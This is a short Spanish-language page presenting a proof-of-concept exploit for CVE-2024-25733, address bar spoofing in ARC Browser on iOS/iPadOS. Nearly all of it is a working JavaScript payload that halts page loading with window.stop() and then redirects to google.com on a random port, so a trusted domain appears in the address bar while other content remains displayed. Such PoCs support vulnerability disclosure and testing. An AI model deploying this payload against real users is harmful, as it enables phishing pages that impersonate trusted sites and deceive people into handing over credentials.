
Exploit de prueba de concepto para CVE-2024-25733 que demuestra la suplantación de la barra de direcciones en el navegador ARC en iOS/iPadOS mediante manipulación de navegación basada en JavaScript.
PoC de suplantación de la barra de direcciones de ARC Browser - iOS/iPadOS
<script>
function spoof() {
setTimeout(() => {
window.stop();
let randomPort;
do {
randomPort = Math.floor(Math.random() * 1000);
} while (randomPort === 0 || randomPort === 443);
document.location = "https://google.com:" + randomPort + "/";
}, 300);
}
spoof();
</script>